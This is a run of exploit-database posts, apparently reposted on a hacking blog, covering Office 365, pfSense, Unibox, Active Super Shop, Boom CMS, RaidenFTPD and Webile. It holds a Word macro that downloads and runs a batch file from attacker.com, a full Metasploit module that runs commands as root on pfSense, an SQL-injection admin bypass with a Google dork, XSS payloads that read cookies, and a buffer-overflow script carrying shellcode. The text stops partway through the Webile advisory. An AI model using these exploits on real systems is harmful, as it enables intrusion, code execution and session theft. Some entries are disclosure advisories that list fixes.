    ## Title: Microsoft Office 365 Version 18.2305.1222.0 - Elevation of Privilege + RCE. ## Author: nu11secur1ty ## Date: 07.18.2023 ## Vendor: https://www.microsoft.com/ ## Software: https://www.microsoft.com/en-us/microsoft-365/microsoft-office ## Reference: https://portswigger.net/web-security/access-control ## CVE-2023-33148 ## Description: The Microsoft Office 365 Version 18.2305.1222.0 app is vulnerable to Elevation of Privilege. The attacker can use this vulnerability to attach a very malicious WORD file in the Outlook app which is a part of Microsoft Office 365 and easily can trick the victim to click on it - opening it and executing a very dangerous shell command, in the background of the local PC. This execution is without downloading this malicious file, and this is a potential problem and a very dangerous case! This can be the end of the victim's PC, it depends on the scenario. ## Staus: HIGH Vulnerability [+]Exploit: - Exploit Server: ```vb Sub AutoOpen() Call Shell("cmd.exe /S /c" & "curl -s https://attacker.com/uqev/namaikitiputkata/golemui.bat > salaries.bat && .\salaries.bat", vbNormalFocus) End Sub ``` ## Reproduce: [href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33148) ## Proof and Exploit [href](https://www.nu11secur1ty.com/2023/07/cve-2023-33148.html) ## Time spend: 00:35:00
  15. HireHackking

    pfSense v2.7.0 - OS Command Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: pfSense v2.7.0 - OS Command Injection #Exploit Author: Emir Polat # CVE-ID : CVE-2023-27253 class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'pfSense Restore RRD Data Command Injection', 'Description' => %q{ This module exploits an authenticated command injection vulnerabilty in the "restore_rrddata()" function of pfSense prior to version 2.7.0 which allows an authenticated attacker with the "WebCfg - Diagnostics: Backup & Restore" privilege to execute arbitrary operating system commands as the "root" user. This module has been tested successfully on version 2.6.0-RELEASE. }, 'License' => MSF_LICENSE, 'Author' => [ 'Emir Polat', # vulnerability discovery & metasploit module ], 'References' => [ ['CVE', '2023-27253'], ['URL', 'https://redmine.pfsense.org/issues/13935'], ['URL', 'https://github.com/pfsense/pfsense/commit/ca80d18493f8f91b21933ebd6b714215ae1e5e94'] ], 'DisclosureDate' => '2023-03-18', 'Platform' => ['unix'], 'Arch' => [ ARCH_CMD ], 'Privileged' => true, 'Targets' => [ [ 'Automatic Target', {}] ], 'Payload' => { 'BadChars' => "\x2F\x27", 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic netcat' } }, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true }, 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS] } ) ) register_options [ OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']), OptString.new('PASSWORD', [true, 'Password to authenticate with', 'pfsense']) ] end def check unless login return Exploit::CheckCode::Unknown("#{peer} - Could not obtain the login cookies needed to validate the vulnerability!") end res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'diag_backup.php'), 'method' => 'GET', 'keep_cookies' => true ) return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil? return Exploit::CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200 unless res&.body&.include?('Diagnostics: ') return Exploit::CheckCode::Safe('Vulnerable module not reachable') end version = detect_version unless version return Exploit::CheckCode::Detected('Unable to get the pfSense version') end unless Rex::Version.new(version) < Rex::Version.new('2.7.0-RELEASE') return Exploit::CheckCode::Safe("Patched pfSense version #{version} detected") end Exploit::CheckCode::Appears("The target appears to be running pfSense version #{version}, which is unpatched!") end def login # Skip the login process if we are already logged in. return true if @logged_in csrf = get_csrf('index.php', 'GET') unless csrf print_error('Could not get the expected CSRF token for index.php when attempting login!') return false end res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', 'vars_post' => { '__csrf_magic' => csrf, 'usernamefld' => datastore['USERNAME'], 'passwordfld' => datastore['PASSWORD'], 'login' => '' }, 'keep_cookies' => true ) if res && res.code == 302 @logged_in = true true else false end end def detect_version res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'GET', 'keep_cookies' => true ) # If the response isn't a 200 ok response or is an empty response, just return nil. unless res && res.code == 200 && res.body return nil end if (%r{Version.+<strong>(?<version>[0-9.]+-RELEASE)\n?</strong>}m =~ res.body).nil? nil else version end end def get_csrf(uri, methods) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, uri), 'method' => methods, 'keep_cookies' => true ) unless res && res.body return nil # If no response was returned or an empty response was returned, then return nil. end # Try regex match the response body and save the match into a variable named csrf. if (/var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body).nil? return nil # No match could be found, so the variable csrf won't be defined. else return csrf end end def drop_config csrf = get_csrf('diag_backup.php', 'GET') unless csrf fail_with(Failure::UnexpectedReply, 'Could not get the expected CSRF token for diag_backup.php when dropping the config!') end post_data = Rex::MIME::Message.new post_data.add_part(csrf, nil, nil, 'form-data; name="__csrf_magic"') post_data.add_part('rrddata', nil, nil, 'form-data; name="backuparea"') post_data.add_part('', nil, nil, 'form-data; name="encrypt_password"') post_data.add_part('', nil, nil, 'form-data; name="encrypt_password_confirm"') post_data.add_part('Download configuration as XML', nil, nil, 'form-data; name="download"') post_data.add_part('', nil, nil, 'form-data; name="restorearea"') post_data.add_part('', 'application/octet-stream', nil, 'form-data; name="conffile"') post_data.add_part('', nil, nil, 'form-data; name="decrypt_password"') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'diag_backup.php'), 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'data' => post_data.to_s, 'keep_cookies' => true ) if res && res.code == 200 && res.body =~ /<rrddatafile>/ return res.body else return nil end end def exploit unless login fail_with(Failure::NoAccess, 'Could not obtain the login cookies!') end csrf = get_csrf('diag_backup.php', 'GET') unless csrf fail_with(Failure::UnexpectedReply, 'Could not get the expected CSRF token for diag_backup.php when starting exploitation!') end config_data = drop_config if config_data.nil? fail_with(Failure::UnexpectedReply, 'The drop config response was empty!') end if (%r{<filename>(?<file>.*?)</filename>} =~ config_data).nil? fail_with(Failure::UnexpectedReply, 'Could not get the filename from the drop config response!') end config_data.gsub!(' ', '${IFS}') send_p = config_data.gsub(file, "WAN_DHCP-quality.rrd';#{payload.encoded};") post_data = Rex::MIME::Message.new post_data.add_part(csrf, nil, nil, 'form-data; name="__csrf_magic"') post_data.add_part('rrddata', nil, nil, 'form-data; name="backuparea"') post_data.add_part('yes', nil, nil, 'form-data; name="donotbackuprrd"') post_data.add_part('yes', nil, nil, 'form-data; name="backupssh"') post_data.add_part('', nil, nil, 'form-data; name="encrypt_password"') post_data.add_part('', nil, nil, 'form-data; name="encrypt_password_confirm"') post_data.add_part('rrddata', nil, nil, 'form-data; name="restorearea"') post_data.add_part(send_p.to_s, 'text/xml', nil, "form-data; name=\"conffile\"; filename=\"rrddata-config-pfSense.home.arpa-#{rand_text_alphanumeric(14)}.xml\"") post_data.add_part('', nil, nil, 'form-data; name="decrypt_password"') post_data.add_part('Restore Configuration', nil, nil, 'form-data; name="restore"') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'diag_backup.php'), 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'data' => post_data.to_s, 'keep_cookies' => true ) if res print_error("The response to a successful exploit attempt should be 'nil'. The target responded with an HTTP response code of #{res.code}. Try rerunning the module.") end end end
  16. HireHackking

    Wifi Soft Unibox Administration 3.0 & 3.1 - SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wifi Soft Unibox Administration 3.0 & 3.1 Login Page - Sql Injection # Google Dork: intext:"Unibox Administration 3.1", intext:"Unibox 3.0" # Date: 07/2023 # Exploit Author: Ansh Jain @sudoark # Author Contact : arkinux01@gmail.com # Vendor Homepage: https://www.wifi-soft.com/ # Software Link: https://www.wifi-soft.com/products/unibox-hotspot-controller.php # Version: Unibox Administration 3.0 & 3.1 # Tested on: Microsoft Windows 11 # CVE : CVE-2023-34635 # CVE URL : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34635 The Wifi Soft Unibox Administration 3.0 and 3.1 Login Page is vulnerable to SQL Injection, which can lead to unauthorised admin access for attackers. The vulnerability occurs because of not validating or sanitising the user input in the username field of the login page and directly sending the input to the backend server and database. ## How to Reproduce Step 1 : Visit the login page and check the version, whether it is 3.0, 3.1, or not. Step 2 : Add this payload " 'or 1=1 limit 1-- - " to the username field and enter any random password. Step 3 : Fill in the captcha and hit login. After hitting login, you have been successfully logged in as an administrator and can see anyone's user data, modify data, revoke access, etc. -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ### Login Request -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------------------------------------------- Parameters: username, password, captcha, action ----------------------------------------------------------------------------------------------------------------------- POST /index.php HTTP/2 Host: 255.255.255.255.host.com Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 83 Origin: https://255.255.255.255.host.com Referer: https://255.255.255.255.host.com/index.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers username='or+1=1+limit+1--+-&password=randompassword&captcha=69199&action=Login -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ### Login Response -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- HTTP/2 302 Found Server: nginx Date: Tue, 18 Jul 2023 13:32:14 GMT Content-Type: text/html; charset=UTF-8 Location: ./dashboard/dashboard Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ### Successful Loggedin Request -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- GET /dashboard/dashboard HTTP/2 Host: 255.255.255.255.host.com Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://255.255.255.255.host.com/index.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ### Successful Loggedin Response -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- HTTP/2 200 OK Server: nginx Date: Tue, 18 Jul 2023 13:32:43 GMT Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Cache_control: private <!DOCTYPE html> <html lang="en"> html content </html>
  17. HireHackking

    Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities References (Source): https://www.vulnerability-lab.com/get_content.php?id=2278 Release Date: 2023-07-04 Vulnerability Laboratory ID (VL-ID): 2278 Common Vulnerability Scoring System: 5.4 Product & Service Introduction: =============================== https://codecanyon.net/item/active-super-shop-multivendor-cms/12124432 Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple html injection vulnerabilities in the Active Super Shop Multi-vendor CMS v2.5 web-application. Affected Product(s): ==================== ActiveITzone Product: Active Super Shop CMS v2.5 (CMS) (Web-Application) Vulnerability Disclosure Timeline: ================================== 2021-08-20: Researcher Notification & Coordination (Security Researcher) 2021-08-21: Vendor Notification (Security Department) 2021-**-**: Vendor Response/Feedback (Security Department) 2021-**-**: Vendor Fix/Patch (Service Developer Team) 2021-**-**: Security Acknowledgements (Security Department) 2023-07-05: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (User Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ Multiple html injection web vulnerabilities has been discovered in the official Active Super Shop Multi-vendor CMS v2.5 web-application. The web vulnerability allows remote attackers to inject own html codes with persistent vector to manipulate application content. The persistent html injection web vulnerabilities are located in the name, phone and address parameters of the manage profile and products branding module. Remote attackers with privileged accountant access are able to inject own malicious script code in the name parameter to provoke a persistent execution on profile view or products preview listing. There are 3 different privileges that are allowed to access the backend like the accountant (low privileges), the manager (medium privileges) or the admin (high privileges). Accountants are able to attack the higher privileged access roles of admins and manager on preview of the elements in the backend to compromise the application. The request method to inject is post and the attack vector is persistent located on the application-side. Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] Manage Details Vulnerable Parameter(s): [+] name [+] phone [+] address Affected Module(s): [+] manage profile [+] products branding Proof of Concept (PoC): ======================= The html injection web vulnerabilities can be exploited by remote attackers with privileged accountant access and with low user interaction. For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue. Exploitation: Payload <img src="https://[DOMAIN]/[PATH]/[PICTURE].*"> Vulnerable Source: manage_admin & branding <div class="tab-pane fade active in" id="" style="border:1px solid #ebebeb; border-radius:4px;"> <div class="panel-heading"> <h3 class="panel-title">Manage Details</h3> </div> <form action="https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/" class="form-horizontal" method="post" accept-charset="utf-8"> <div class="panel-body"> <div class="form-group"> <label class="col-sm-3 control-label" for="demo-hor-1">Name</label> <div class="col-sm-6"> <input type="text" name="name" value="Mr. Accountant"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">" id="demo-hor-1" class="form-control required"> </div></div> <div class="form-group"> <label class="col-sm-3 control-label" for="demo-hor-2">Email</label> <div class="col-sm-6"> <input type="email" name="email" value="accountant@shop.com" id="demo-hor-2" class="form-control required"> </div></div> <div class="form-group"> <label class="col-sm-3 control-label" for="demo-hor-3"> Phone</label> <div class="col-sm-6"> <input type="text" name="phone" value="017"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">" id="demo-hor-3" class="form-control"> </div></div> --- PoC Session Logs (POST) --- https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/ Host: assm_cms.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html, */*; q=0.01 X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------280242453224137385302547344680 Content-Length: 902 Origin:https://assm_cms.localhost:8080 Connection: keep-alive Referer:https://assm_cms.localhost:8080/shop/admin/manage_admin/ Cookie: ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; curr=1 - POST: HTTP/3.0 200 OK content-type: text/html; charset=UTF-8 ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; path=/; HttpOnly https://assm_cms.localhost:8080/shop/admin/manage_admin/ Host: assm_cms.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Reference(s): https://assm_cms.localhost:8080/shop/ https://assm_cms.localhost:8080/shop/admin/ https://assm_cms.localhost:8080/shop/admin/manage_admin/ https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/ Solution - Fix & Patch: ======================= Disallow inseration of html code for input fields like name, adress and phone. Sanitize the content to secure deliver. Security Risk: ============== The security risk of the html injection web vulnerabilities in the shopping web-application are estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
  18. HireHackking

    Boom CMS v8.0.7 - Cross Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Boom CMS v8.0.7 - Cross Site Scripting References (Source): https://www.vulnerability-lab.com/get_content.php?id=2274 Release Date: 2023-07-03 Vulnerability Laboratory ID (VL-ID): 2274 Product & Service Introduction: =============================== Boom is a fully featured, easy to use CMS. More than 10 years, and many versions later, Boom is an intuitive, WYSIWYG CMS that makes life easy for content editors and website managers. Working with BoomCMS is simple. It's easy and quick to learn and start creating content. It gives editors control but doesn't require any technical knowledge. (Copy of the Homepage:https://www.boomcms.net/boom-boom ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a persistent cross site vulnerability in the Boom CMS v8.0.7 web-application. Affected Product(s): ==================== UXB London Product: Boom v8.0.7 - Content Management System (Web-Application) Vulnerability Disclosure Timeline: ================================== 2022-07-24: Researcher Notification & Coordination (Security Researcher) 2022-07-25: Vendor Notification (Security Department) 2023-**-**: Vendor Response/Feedback (Security Department) 2023-**-**: Vendor Fix/Patch (Service Developer Team) 2023-**-**: Security Acknowledgements (Security Department) 2023-07-03: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (User Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ A persistent script code injection web vulnerability has been discovered in the official Boom CMS v8.0.7 web-application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The vulnerability is located in the input fields of the album title and album description in the asset-manager module. Attackers with low privileges are able to add own malformed albums with malicious script code in the title and description. After the inject the albums are being displayed in the backend were the execute takes place on preview of the main assets. The attack vector of the vulnerability is persistent and the request method to inject is post. The validation tries to parse the content by usage of a backslash. Thus does not have any impact to inject own malicious java-scripts because of its only performed for double- and single-quotes to prevent sql injections. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] assets-manager (album) Vulnerable Function(s): [+] add Vulnerable Parameter(s): [+] title [+] description Affected Module(s): [+] Frontend (Albums) [+] Backend (Albums Assets) Proof of Concept (PoC): ======================= The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and with low user interaction. For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Login to the application as restricted user 2. Create a new album 3. Inject a test script code payload to title and description 4. Save the request 5. Preview frontend (albums) and backend (assets-manager & albums listing) to provoke the execution 6. Successful reproduce of the persistent cross site web vulnerability! Payload(s): ><script>alert(document.cookie)</script><div style=1 <a onmouseover=alert(document.cookie)>test</a> --- PoC Session Logs (Inject) --- https://localhost:8000/boomcms/album/35 Host: localhost:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 263 Origin:https://localhost:8000 Connection: keep-alive Referer:https://localhost:8000/boomcms/asset-manager/albums/[evil.source] Sec-Fetch-Site: same-origin {"asset_count":1,"id":35,"name":""><[INJECTED SCRIPT CODE PAYLOAD 1!]>","description":""><[INJECTED SCRIPT CODE PAYLOAD 2!]>", "slug":"a","order":null,"site_id":1,"feature_image_id":401,"created_by":9,"deleted_by" :null,"deleted_at":null,"created_at":"2021-xx-xx xx:x:x","updated_at":"2021-xx-xx xx:x:x"} - PUT: HTTP/1.1 200 OK Server: Apache Cache-Control: no-cache, private Set-Cookie: Max-Age=7200; path=/ Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUF VV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtY yOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED; Max-Age=7200; path=/; httponly Content-Length: 242 Connection: Keep-Alive Content-Type: application/json - https://localhost:8000/boomcms/asset-manager/albums/[evil.source] Host: localhost:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate, br Connection: keep-alive Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUF VV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtY yOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED; - GET: HTTP/1.1 200 OK Server: Apache Cache-Control: no-cache, private Set-Cookie: Vary: Accept-Encoding Content-Length: 7866 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 - Vulnerable Source: asset-manager/albums/[ID] <li data-album="36"> <a href="#albums/20"> <div> <h3>[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]</h3> <p class="description">"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p> <p class='count'><span>0</span> assets</p> </div> </a> </li> </iframe></p></div></a></li></ul></div></div> </div> <div id="b-assets-view-asset-container"></div> <div id="b-assets-view-selection-container"></div> <div id="b-assets-view-album-container"><div><div id="b-assets-view-album"> <div class="heading"> <h1 class="bigger b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]></h1> <p class="description b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p> </div> Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure parse and encode of the vulnerable title and description parameters. Restrict the input fields and disallow usage of special chars. Sanitize the output listing location to prevent further attacks. Security Risk: ============== The security risk of the persistent input validation web vulnerability in the application is estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
  19. HireHackking

    RaidenFTPD 2.4.4005 - Buffer Overflow (SEH)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: RaidenFTPD 2.4.4005 - Buffer Overflow (SEH) # Date: 18/07/2023 # Exploit Author: Andre Nogueira # Vendor Homepage: https://www.raidenftpd.com/en/ # Software Link: http://www.raidenmaild.com/download/raidenftpd2.exe # Version: RaidenFTPD 2.4.4005 # Tested on: Microsoft Windows 10 Build 19045 # 1.- Open RaidenFTPD # 2.- Click on 'Setup' -> 'Step by step setup wizard' # 3.- Run python code: exploit-raidenftpd.py # 4.- Paste the content of exploit-raiden.txt into the field 'Server name' # 5.- Click 'next' -> 'next' -> 'ok' # 6.- Pop calc.exe #!/usr/bin/env python3 from struct import pack crash = 2000 offset = 497 # msfvenom -p windows/exec CMD="calc.exe" -a x86 -f python -v shellcode --b "\x00\x0d" shellcode = b"\x90" * 8 shellcode += b"\xb8\x9c\x78\x14\x60\xd9\xc2\xd9\x74\x24\xf4" shellcode += b"\x5a\x33\xc9\xb1\x31\x83\xea\xfc\x31\x42\x0f" shellcode += b"\x03\x42\x93\x9a\xe1\x9c\x43\xd8\x0a\x5d\x93" shellcode += b"\xbd\x83\xb8\xa2\xfd\xf0\xc9\x94\xcd\x73\x9f" shellcode += b"\x18\xa5\xd6\x34\xab\xcb\xfe\x3b\x1c\x61\xd9" shellcode += b"\x72\x9d\xda\x19\x14\x1d\x21\x4e\xf6\x1c\xea" shellcode += b"\x83\xf7\x59\x17\x69\xa5\x32\x53\xdc\x5a\x37" shellcode += b"\x29\xdd\xd1\x0b\xbf\x65\x05\xdb\xbe\x44\x98" shellcode += b"\x50\x99\x46\x1a\xb5\x91\xce\x04\xda\x9c\x99" shellcode += b"\xbf\x28\x6a\x18\x16\x61\x93\xb7\x57\x4e\x66" shellcode += b"\xc9\x90\x68\x99\xbc\xe8\x8b\x24\xc7\x2e\xf6" shellcode += b"\xf2\x42\xb5\x50\x70\xf4\x11\x61\x55\x63\xd1" shellcode += b"\x6d\x12\xe7\xbd\x71\xa5\x24\xb6\x8d\x2e\xcb" shellcode += b"\x19\x04\x74\xe8\xbd\x4d\x2e\x91\xe4\x2b\x81" shellcode += b"\xae\xf7\x94\x7e\x0b\x73\x38\x6a\x26\xde\x56" shellcode += b"\x6d\xb4\x64\x14\x6d\xc6\x66\x08\x06\xf7\xed" shellcode += b"\xc7\x51\x08\x24\xac\xae\x42\x65\x84\x26\x0b" shellcode += b"\xff\x95\x2a\xac\xd5\xd9\x52\x2f\xdc\xa1\xa0" shellcode += b"\x2f\x95\xa4\xed\xf7\x45\xd4\x7e\x92\x69\x4b" shellcode += b"\x7e\xb7\x09\x0a\xec\x5b\xe0\xa9\x94\xfe\xfc" nSEH = b"\xeb\x06\x90\x90" # short jump of 8 bytes SEH = pack("<L", 0x7c1e76ff) # pop eax; pop esi; ret; => msvcp70.dll buffer = b"A" * offset buffer += nSEH buffer += SEH buffer += shellcode buffer += b"D" * (crash -len(buffer)) file_payload = open("exploit-raiden.txt", 'wb') print("[*] Creating the .txt file for out payload") file_payload.write(buffer) print("[*] Writing malicious payload to the .txt file") file_payload.close()
  20. HireHackking

    Webile v1.0.1 - Multiple Cross Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: Webile v1.0.1 - Multiple Cross Site Scripting References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2321 Release Date: ============= 2023-07-03 Vulnerability Laboratory ID (VL-ID): ==================================== 2321 Common Vulnerability Scoring System: ==================================== 5.5 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== Webile, is a local area network cross-platform file management tool based on http protocol. Using the personal mobile phone as a server in the local area network, browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data, statistics files, displaying performance, etc. No need to connect to the Internet, you can browse files, send data, play videos and other functions through WiFi LAN or mobile phone hotspot, and no additional data traffic will be generated during data transmission. Support Mac, Windows, Linux, iOS, Android and other multi-platform operating systems. (Copy of the Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple persistent web vulnerabilities in the Webile v1.0.1 Wifi mobile android web application. Affected Product(s): ==================== Product Owner: Webile Product: Webile v1.0.1 - (Framework) (Mobile Web-Application) Vulnerability Disclosure Timeline: ================================== 2022-10-11: Researcher Notification & Coordination (Security Researcher) 2022-10-12: Vendor Notification (Security Department) 2022-**-**: Vendor Response/Feedback (Security Department) 2022-**-**: Vendor Fix/Patch (Service Developer Team) 2022-**-**: Security Acknowledgements (Security Department) 2023-07-03: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (Guest Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ Multiple persistent input validation web vulnerabilities has been discoveredin the Webile v1.0.1 Wifi mobile android web application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The persistent input validation web vulnerabilities are located in the send and add function. Remote attackers are able to inject own malicious script codes to the new_file_name and i parameter post method request to provoke a persistent execution of the malformed content. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Parameter(s): [+] new_file_name [+] i Proof of Concept (PoC): ======================= The persistent input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction. For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue. Vulnerable Source: Send Send message to phone listing <div class="layui-colla-item"> <div class="layui-card-header">Message</div> <div class="layui-colla-content" style="display:block;padding-left:16px;"> <div class="layui-form-item layui-form-text" id="showMsg"><div><font color="blue">20:10:11</font><a href="javascript:;" title="Copy" onclick="copy(1658081411827)"><i class="iconfont">&nbsp;&nbsp;</i></a><br> <span id="c_1658081411827">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span><br><br></div> </div></div></div> history logs messages <table class="layui-table layui-form"> <thead><tr> <th style="text-align: center;vertical-align: middle!important;border-left-width:1px;border-right-width:1px;height:32px;" width="2%" align="center"> <input type="checkbox" lay-filter="checkall" name="" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div></th> <th style="border-right-width:1px;">Message</th> <th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="15%">Date</th> <th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="3%" valign="center">Action</th></tr> </thead> <tbody><tr> <td style="text-align: center;vertical-align: middle!important;border-left-width:1px;min-height:180px;" align="center"> <input type="checkbox" name="id" value="3" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon 